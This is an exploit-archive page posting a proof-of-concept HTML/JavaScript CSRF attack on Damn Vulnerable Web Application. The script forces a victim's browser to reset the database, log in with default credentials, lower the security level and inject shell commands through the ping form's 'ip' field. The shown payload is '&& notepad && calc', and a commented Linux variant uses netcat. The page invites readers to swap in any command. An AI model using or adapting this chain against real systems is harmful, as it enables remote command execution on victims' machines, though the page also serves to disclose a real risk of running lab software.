exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

DVWA Cross Site Request Forgery

DVWA Cross Site Request Forgery
Posted Sep 15, 2014
Authored by Paulos Yibelo

Damn Vulnerable Web Application, which is meant to be a vulnerable web application for security testing, can be leveraged by attackers to compromise your system when in use. This is a good reminder to only use DVWA on an air-gapped network. This exploits demonstrates the ability to gain code execution on the system.

tags | exploit, web, code execution, csrf
SHA-256 | 75399c599af8214d734313a75983c0648c16b80932511c55319919111ea07883

DVWA Cross Site Request Forgery

Change Mirror Download
<!-- There are multiple CSRF issues in DVWA. Attackers can use these CSRF exploits to
first reset the DVWA database of victim, then make the victim log in using the default resets,
next crafts another CSRF to change the challenge level to low to make exploitation more probable,
then use these to craft a command execution CSRF and possibly get a shell. :)

*This PoC will open calculator as a demo execution in approximately 5 seconds.*

The attacker just needs to know you have DVWA for this to work.

Paulos Yibelo and Tabor N. Shiferaw 2014

-->

<script src='https://ajax.googleapis.com/ajax/libs/jquery/1.8.0/jquery.min.js' type='text/javascript'>
</script>
<div id='loader'></div>

<Script>

//document.getElementById("loader").innerHTML = 'Loading...';

var one = {"create_db":'whatever'};
var two = {"username":"admin","password":"password","Login":"Login"};
var three = {"security":"low","seclev_submit":"Submit"};

//windows opens calculator; change this to whatever your desire
var four = {"ip":"127.0.0.1 && notepad && calc","submit":"submit"};

//linux
//var four = {"ip":"127.0.0.1;netcat -l 15.11.11.x -p 4444","submit":"submit"};

/*
*step 1
*Reset the Databse
*/
function start_exploit()
{
$("#loader").html("Loading...");
$.ajax({
url:"http://localhost/dvwa/setup.php",
type:"POST",
data:one,
success:
function(x){
dvwaLogin();
}

});
}
/*
*step 2
*login using default new password
*/
function dvwaLogin()
{
$.ajax({
url:"http://localhost/dvwa/login.php",
type:"POST",
data:two,
success:function(x){
levelChanger();
}
});
}
/*
*step 3
*set level to low
*/
function levelChanger(){
$.ajax({
url:"http://localhost/dvwa/security.php",
type:"POST",
data:three,
success:function(x){
commandExecution();
}
});
}

/*
*step 4
*execute command
*/
function commandExecution(){
$.ajax(
{
url:"http://localhost/dvwa/vulnerabilities/exec/index.php",
type:"POST",
data:four,
success:function(x){
//document.getElementById("loader").innerHTML = "Executed";
$("#loader").text("Loaded");
}
}
);
}


start_exploit();
</script>

<!-- check out http://paulosyibelo.blogspot.com/2014/09/dvwa-unintended-security-issues.html for more -->

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close